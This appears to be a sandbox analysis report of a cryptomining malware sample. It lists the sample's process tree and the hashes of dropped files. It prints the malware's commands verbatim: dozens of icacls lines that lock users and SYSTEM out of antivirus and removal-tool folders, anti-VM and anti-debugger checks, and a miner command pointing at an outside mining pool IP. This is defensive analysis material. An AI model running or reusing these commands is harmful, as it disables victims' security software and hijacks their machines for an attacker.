C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)3⤵PID:1492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)2⤵PID:828
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)2⤵PID:2684
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)2⤵PID:2700
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)2⤵PID:2712
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)3⤵PID:2088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵PID:1128
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵PID:2716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵PID:1948
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵PID:2004
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)2⤵PID:2352
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)2⤵PID:2344
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)2⤵PID:1820
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)2⤵PID:2744
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)3⤵PID:2092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵PID:1796
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵PID:900
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:1456
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)2⤵PID:2968
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵PID:552
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)2⤵PID:2084
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)2⤵PID:3024
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)3⤵PID:804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)2⤵PID:3060
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)2⤵PID:2136
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)2⤵PID:932
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵PID:2876
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵PID:2472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:2728
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵PID:2584
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:2532
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)2⤵PID:1576
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)2⤵PID:2388
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)2⤵PID:2424
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)2⤵PID:2632
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)3⤵PID:2160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)2⤵PID:2520
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)2⤵PID:2272
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)2⤵PID:2080
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)2⤵PID:1512
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)2⤵PID:1568
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)2⤵PID:1940
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)2⤵PID:1736
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)3⤵PID:1544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)2⤵PID:1632
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)2⤵PID:1212
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)2⤵PID:1716
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)2⤵PID:1340
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)2⤵PID:828
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)2⤵PID:2684
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)3⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)2⤵PID:2700
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)3⤵PID:1928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)2⤵PID:2732
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵PID:2944
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)2⤵PID:1948
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)2⤵PID:2004
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)2⤵PID:2352
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)2⤵PID:2344
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)2⤵PID:1820
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)2⤵PID:2744
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)2⤵PID:1796
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)2⤵PID:900
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)3⤵PID:2844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)2⤵PID:688
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)2⤵PID:1268
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)2⤵PID:552
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)2⤵PID:1336
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)2⤵PID:876
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵PID:2312
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)2⤵PID:2956
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)2⤵PID:1620
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)3⤵PID:2460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)2⤵PID:2216
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)3⤵PID:2488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)2⤵PID:2640
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)2⤵PID:2724
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)2⤵PID:2380
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)2⤵PID:2396
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)3⤵PID:2676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)2⤵PID:2484
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)2⤵PID:2508
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)3⤵PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)2⤵PID:2056
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)2⤵PID:3016
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)2⤵PID:1092
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)2⤵PID:1764
-
C:\Windows\system32\icacls.exeicacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)2⤵PID:240
-
C:\Windows\system32\icacls.exeicacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)3⤵PID:1112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)2⤵PID:1592
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)2⤵PID:1544
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2820
-
-
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:1752
-
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:/ProgramData/WindowsTask/MicrosoftHost.exe -o stratum+tcp://185.195.27.66:3333 -u CPU --donate-level=1 -k --cpu-priority=0 -t42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:520
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "99578798-16648965089346005211666517002-66507718719892648241237671764167248787"1⤵PID:1668
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1532076987535892868-1318982636567691549-1901693088-306722377-1917635383-1309216503"1⤵PID:1908
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "720042770-5598032622037878406361778976-6947667291438920734-1229665481-1835025969"1⤵PID:1108
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "514217796540824161978218937-7714203541919537148-1632723389-1660943595-1229707268"1⤵PID:1532
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-7685502551388840987-801045349471662188-1338669606-16276244601889450140-1803788374"1⤵PID:1656
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1996966166-970006791214027900413772189-20727290133551985-8471431751567104652"1⤵PID:2656
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1233178464141542427769472762-542679677-1799864477-731485506-1631908126-1854290187"1⤵PID:2596
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "960411327190999162447336359312373609351497984271434222293-472220035-593048912"1⤵PID:2548
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-783557052-18925031321609291218650742461342292600-14185566071185253542-662217815"1⤵PID:2492
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2025088943299426477-6300347271002965667158133633-1035545711230778351-554010994"1⤵PID:2480
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.2MB
MD5eb75a866888052e05a578ffb872a8393
SHA1dbf905d0ab4583e939224ec500a818c958483437
SHA2561fbb5fd5504b31df05a207f7267ecb44cba4fa221e406812c1651f64188557f9
SHA5127346a5f617d64b861aa11942c1c0628bf0f4c3e206a172b465c6f73ad44d8d580ca7f13daf3fc94a420a014046ceade3f6cb4afd8536bbe2cb8a9093d1c5bb5f
-
Filesize
5.2MB
MD5e8ffe812b5a2d068d85ca363b3517c32
SHA1a12dd68e7cb09bfcf08a3c61162230f92fd74f55
SHA25655bb09f52b39deb0de2a2ec4bd05624ac4de1b6a7a576cc9ac0eaf6342aebb1d
SHA5126b14d3d649e077c0a099de43683939405cefb058398fed2ebcd9a952066413f82f3e4a7a9722141cf86927702deeea1604cb2fc90d2ea5935241e19d523e5a56
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
Filesize
7.1MB
MD5bcbb6f2d561ea3b6cd8f3cfc13486b9e
SHA152bb4b2d2484f4b2caee8acedfed50e7a4e928e6
